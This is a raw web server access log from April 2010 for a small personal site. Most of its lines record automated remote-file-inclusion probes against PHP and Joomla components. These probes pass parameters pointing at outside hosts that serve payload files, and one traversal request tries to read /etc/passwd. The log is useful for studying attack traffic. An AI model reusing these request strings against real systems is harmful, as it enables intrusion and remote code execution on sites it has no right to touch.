67.205.63.238 - - [26/Apr/2010:04:49:28 -0500] "GET /logs/access_log.1270684800%20%20/administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:04:49:57 -0500] "GET /logs/access_log.1219708800//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 387 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:04:52:25 -0500] "GET /logs/access_log.1219708800//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 387 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:04:52:25 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:04:52:25 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
207.46.204.179 - - [26/Apr/2010:04:54:55 -0500] "GET /logs/access_log.1251244800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [26/Apr/2010:05:01:32 -0500] "GET /logs/access_log.1216857600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.190 - - [26/Apr/2010:05:03:24 -0500] "GET /logs/access_log.1240012800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.189.224.16 - - [26/Apr/2010:05:13:57 -0500] "GET /logs///skin/pqbig_board_blue/login.php?dir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:05:13:57 -0500] "GET /logs/access_log.1263513600///skin/pqbig_board_blue/login.php?dir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:05:13:57 -0500] "GET ///skin/pqbig_board_blue/login.php?dir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:05:13:57 -0500] "GET /logs/access_log.1263427200///skin/pqbig_board_blue/login.php?dir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:05:14:05 -0500] "GET /logs/access_log.1263513600///skin/pqbig_board_blue/login.php?dir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:05:14:05 -0500] "GET /logs///skin/pqbig_board_blue/login.php?dir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:05:14:05 -0500] "GET ///skin/pqbig_board_blue/login.php?dir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:05:14:37 -0500] "GET ///skin/pqbig_board_blue/login.php?dir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:05:14:37 -0500] "GET /logs/access_log.1263513600///skin/pqbig_board_blue/login.php?dir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:05:14:37 -0500] "GET /logs///skin/pqbig_board_blue/login.php?dir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:05:16:07 -0500] "GET /?INCLUDE_FOLDER=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:05:16:07 -0500] "GET /logs/?INCLUDE_FOLDER=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 200 3218 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:05:16:07 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:05:16:07 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:05:16:07 -0500] "GET /forum//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:05:16:07 -0500] "GET /logs/forum//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:05:16:07 -0500] "GET /logs/access_log.1270684800/forum//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
72.14.193.67 - - [26/Apr/2010:05:16:34 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://translate.googleusercontent.com/translate_c?hl=ru&langpair=en%7Cru&u=http://en.wikipedia.org/wiki/Flash_(tattoo)&rurl=translate.google.ru&usg=ALkJrhi_eJuh6osXe1NkMY2981nfxvNbDg""Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1,gzip(gfe) (via translate.google.com)"
95.139.254.110 - - [26/Apr/2010:05:16:35 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://translate.googleusercontent.com/translate_c?hl=ru&langpair=en%7Cru&u=http://tomdolan.pconline.com/tattoo/tattoo1.htm&rurl=translate.google.ru&usg=ALkJrhgBFUg8t2EwtEQhan8wf7XioUnEbA""Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1"
72.14.193.67 - - [26/Apr/2010:05:16:43 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://translate.googleusercontent.com/translate_c?hl=ru&langpair=en%7Cru&u=http://tomdolan.pconline.com/tattoo/tattoo1.htm&rurl=translate.google.ru&usg=ALkJrhgBFUg8t2EwtEQhan8wf7XioUnEbA""Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1,gzip(gfe) (via translate.google.com)"
95.139.254.110 - - [26/Apr/2010:05:16:44 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://translate.googleusercontent.com/translate_c?hl=ru&langpair=en%7Cru&u=http://tomdolan.pconline.com/tattoo/set1.htm&rurl=translate.google.ru&usg=ALkJrhiVVYGeefzlHNE8F83bMFrWDHBHXg""Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1"
95.139.254.110 - - [26/Apr/2010:05:16:44 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://translate.googleusercontent.com/translate_c?hl=ru&langpair=en%7Cru&u=http://tomdolan.pconline.com/tattoo/set1.htm&rurl=translate.google.ru&usg=ALkJrhiVVYGeefzlHNE8F83bMFrWDHBHXg""Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1"
95.139.254.110 - - [26/Apr/2010:05:16:44 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://translate.googleusercontent.com/translate_c?hl=ru&langpair=en%7Cru&u=http://tomdolan.pconline.com/tattoo/set1.htm&rurl=translate.google.ru&usg=ALkJrhiVVYGeefzlHNE8F83bMFrWDHBHXg""Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1"
95.139.254.110 - - [26/Apr/2010:05:16:44 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://translate.googleusercontent.com/translate_c?hl=ru&langpair=en%7Cru&u=http://tomdolan.pconline.com/tattoo/set1.htm&rurl=translate.google.ru&usg=ALkJrhiVVYGeefzlHNE8F83bMFrWDHBHXg""Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1"
95.139.254.110 - - [26/Apr/2010:05:16:44 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://translate.googleusercontent.com/translate_c?hl=ru&langpair=en%7Cru&u=http://tomdolan.pconline.com/tattoo/set1.htm&rurl=translate.google.ru&usg=ALkJrhiVVYGeefzlHNE8F83bMFrWDHBHXg""Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1"
95.139.254.110 - - [26/Apr/2010:05:16:44 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://translate.googleusercontent.com/translate_c?hl=ru&langpair=en%7Cru&u=http://tomdolan.pconline.com/tattoo/set1.htm&rurl=translate.google.ru&usg=ALkJrhiVVYGeefzlHNE8F83bMFrWDHBHXg""Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1"
95.139.254.110 - - [26/Apr/2010:05:16:44 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://translate.googleusercontent.com/translate_c?hl=ru&langpair=en%7Cru&u=http://tomdolan.pconline.com/tattoo/set1.htm&rurl=translate.google.ru&usg=ALkJrhiVVYGeefzlHNE8F83bMFrWDHBHXg""Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1"
95.139.254.110 - - [26/Apr/2010:05:16:44 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://translate.googleusercontent.com/translate_c?hl=ru&langpair=en%7Cru&u=http://tomdolan.pconline.com/tattoo/set1.htm&rurl=translate.google.ru&usg=ALkJrhiVVYGeefzlHNE8F83bMFrWDHBHXg""Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1"
95.139.254.110 - - [26/Apr/2010:05:16:46 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://translate.googleusercontent.com/translate_c?hl=ru&langpair=en%7Cru&u=http://tomdolan.pconline.com/tattoo/set1.htm&rurl=translate.google.ru&usg=ALkJrhiVVYGeefzlHNE8F83bMFrWDHBHXg""Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1"
95.139.254.110 - - [26/Apr/2010:05:16:48 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://translate.googleusercontent.com/translate_c?hl=ru&langpair=en%7Cru&u=http://tomdolan.pconline.com/tattoo/set1.htm&rurl=translate.google.ru&usg=ALkJrhiVVYGeefzlHNE8F83bMFrWDHBHXg""Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1"
95.139.254.110 - - [26/Apr/2010:05:16:49 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://translate.googleusercontent.com/translate_c?hl=ru&langpair=en%7Cru&u=http://tomdolan.pconline.com/tattoo/set1.htm&rurl=translate.google.ru&usg=ALkJrhiVVYGeefzlHNE8F83bMFrWDHBHXg""Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1"
95.139.254.110 - - [26/Apr/2010:05:16:49 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://translate.googleusercontent.com/translate_c?hl=ru&langpair=en%7Cru&u=http://tomdolan.pconline.com/tattoo/set1.htm&rurl=translate.google.ru&usg=ALkJrhiVVYGeefzlHNE8F83bMFrWDHBHXg""Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1"
95.139.254.110 - - [26/Apr/2010:05:16:50 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://translate.googleusercontent.com/translate_c?hl=ru&langpair=en%7Cru&u=http://tomdolan.pconline.com/tattoo/set1.htm&rurl=translate.google.ru&usg=ALkJrhiVVYGeefzlHNE8F83bMFrWDHBHXg""Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1"
222.236.47.182 - - [26/Apr/2010:05:16:50 -0500] "GET /logs/?INCLUDE_FOLDER=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 200 3218 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:05:16:50 -0500] "GET /?INCLUDE_FOLDER=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:05:16:50 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:05:16:50 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:05:18:16 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:05:18:16 -0500] "GET /logs/?INCLUDE_FOLDER=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 200 3218 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:05:18:16 -0500] "GET /?INCLUDE_FOLDER=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:05:18:16 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:05:20:42 -0500] "GET /logs/access_log.1270684800/forum//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
207.46.13.94 - - [26/Apr/2010:05:28:24 -0500] "GET /logs/access_log.1168387200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.131.106.30 - - [26/Apr/2010:05:30:22 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.30 - - [26/Apr/2010:05:30:25 -0500] "GET /costume/links.htm HTTP/1.0" 200 1029 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
202.131.93.10 - - [26/Apr/2010:05:48:45 -0500] "GET /logs/access_log.1270684800//playing.php/common/db.php?commonpath=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
202.131.93.10 - - [26/Apr/2010:05:48:45 -0500] "GET /logs//playing.php/common/db.php?commonpath=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
202.131.93.10 - - [26/Apr/2010:05:48:45 -0500] "GET //playing.php/common/db.php?commonpath=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
202.131.93.10 - - [26/Apr/2010:05:51:54 -0500] "GET //playing.php/common/db.php?commonpath=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
202.131.93.10 - - [26/Apr/2010:05:51:54 -0500] "GET /logs/access_log.1270684800%20%20//playing.php/common/db.php?commonpath=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
202.131.93.10 - - [26/Apr/2010:05:51:55 -0500] "GET /logs//playing.php/common/db.php?commonpath=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:05:57:09 -0500] "GET ///include/footer.php?_path[counter]=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:05:57:09 -0500] "GET /logs/access_log.1266105600///include/footer.php?_path[counter]=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:05:57:09 -0500] "GET /logs///include/footer.php?_path[counter]=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:05:58:13 -0500] "GET ///include/footer.php?_path[counter]=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:05:58:13 -0500] "GET /logs///include/footer.php?_path[counter]=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:05:58:13 -0500] "GET /logs/access_log.1266105600///include/footer.php?_path[counter]=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:05:58:20 -0500] "GET ///include/footer.php?_path[counter]=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:05:58:20 -0500] "GET /logs///include/footer.php?_path[counter]=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:05:58:20 -0500] "GET /logs/access_log.1266105600///include/footer.php?_path[counter]=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
202.131.93.10 - - [26/Apr/2010:06:00:44 -0500] "GET /logs//playing.php/common/db.php?commonpath=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
202.131.93.10 - - [26/Apr/2010:06:00:44 -0500] "GET //playing.php/common/db.php?commonpath=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
202.131.93.10 - - [26/Apr/2010:06:00:44 -0500] "GET /logs/access_log.1268265600//playing.php/common/db.php?commonpath=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
207.46.204.183 - - [26/Apr/2010:06:04:24 -0500] "GET /logs/access_log.1233619200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.95 - - [26/Apr/2010:06:13:55 -0500] "GET /logs/access_log.1235260800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.115.131.17 - - [26/Apr/2010:06:15:34 -0500] "GET /logs/access_log.1220054400//cgi-bin//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
203.115.131.17 - - [26/Apr/2010:06:15:34 -0500] "GET //cgi-bin//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
203.115.131.17 - - [26/Apr/2010:06:15:34 -0500] "GET /logs//cgi-bin//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
81.167.65.30 - - [26/Apr/2010:06:21:08 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
81.167.65.30 - - [26/Apr/2010:06:21:08 -0500] "GET /logs/access_log.1217548800//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.167.65.30 - - [26/Apr/2010:06:21:08 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
81.167.65.30 - - [26/Apr/2010:06:21:13 -0500] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
207.46.195.231 - - [26/Apr/2010:06:22:24 -0500] "GET /logs/access_log.1225756800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.167.65.30 - - [26/Apr/2010:06:22:34 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.167.65.30 - - [26/Apr/2010:06:22:34 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.167.65.30 - - [26/Apr/2010:06:22:34 -0500] "GET /logs/access_log.1268611200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.167.65.30 - - [26/Apr/2010:06:23:39 -0500] "GET /logs/access_log.1212537600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.167.65.30 - - [26/Apr/2010:06:25:15 -0500] "GET /logs/access_log.1268611200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
122.199.140.158 - - [26/Apr/2010:06:27:21 -0500] "GET /logs/access_log.1268611200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
122.199.140.158 - - [26/Apr/2010:06:27:21 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
122.199.140.158 - - [26/Apr/2010:06:27:21 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.252.224.4 - - [26/Apr/2010:06:28:35 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.252.224.4 - - [26/Apr/2010:06:28:35 -0500] "GET /logs/access_log.1219363200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.252.224.4 - - [26/Apr/2010:06:28:35 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.167.65.30 - - [26/Apr/2010:06:30:15 -0500] "GET /logs/access_log.1217462400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.167.65.30 - - [26/Apr/2010:06:30:22 -0500] "GET /logs/access_log.1217548800%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
67.195.112.180 - - [26/Apr/2010:06:31:54 -0500] "GET /logs/access_log.1192320000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
122.199.140.158 - - [26/Apr/2010:06:32:02 -0500] "GET /logs/access_log.1212537600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
77.92.94.85 - - [26/Apr/2010:06:32:24 -0500] "GET /logs//admin/auth.php?xcart_dir=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.813"
77.92.94.85 - - [26/Apr/2010:06:32:25 -0500] "GET //admin/auth.php?xcart_dir=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.813"
66.221.63.33 - - [26/Apr/2010:06:33:59 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 306 "-""Mozilla/5.0"
66.221.63.33 - - [26/Apr/2010:06:33:59 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 311 "-""Mozilla/5.0"
66.221.63.33 - - [26/Apr/2010:06:33:59 -0500] "GET /logs/access_log.1219622400//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 333 "-""Mozilla/5.0"
66.221.63.33 - - [26/Apr/2010:06:42:16 -0500] "GET /logs/access_log.1219708800//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 333 "-""Mozilla/5.0"
173.161.94.250 - - [26/Apr/2010:06:43:38 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 339 "-""libwww-perl/5.834"
173.161.94.250 - - [26/Apr/2010:06:43:38 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 334 "-""libwww-perl/5.834"
122.199.140.158 - - [26/Apr/2010:06:47:53 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
122.199.140.158 - - [26/Apr/2010:06:47:53 -0500] "GET /logs/access_log.1217548800%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
122.199.140.158 - - [26/Apr/2010:06:47:56 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
122.199.140.158 - - [26/Apr/2010:06:48:07 -0500] "GET /logs/access_log.1217462400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
72.55.146.200 - - [26/Apr/2010:06:50:45 -0500] "GET /logs/access_log.1209600000//errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
72.55.146.200 - - [26/Apr/2010:06:50:45 -0500] "GET //errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
72.55.146.200 - - [26/Apr/2010:06:50:45 -0500] "GET /logs//errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
65.55.107.179 - - [26/Apr/2010:06:52:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.252.224.4 - - [26/Apr/2010:06:54:11 -0500] "GET /logs/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.252.224.4 - - [26/Apr/2010:06:54:11 -0500] "GET /logs/access_log.1264118400/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.252.224.4 - - [26/Apr/2010:06:54:11 -0500] "GET /src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
66.252.224.4 - - [26/Apr/2010:06:54:11 -0500] "GET /logs/access_log.1262736000/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
123.30.181.5 - - [26/Apr/2010:06:54:18 -0500] "GET /logs/access_log.1262649600/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
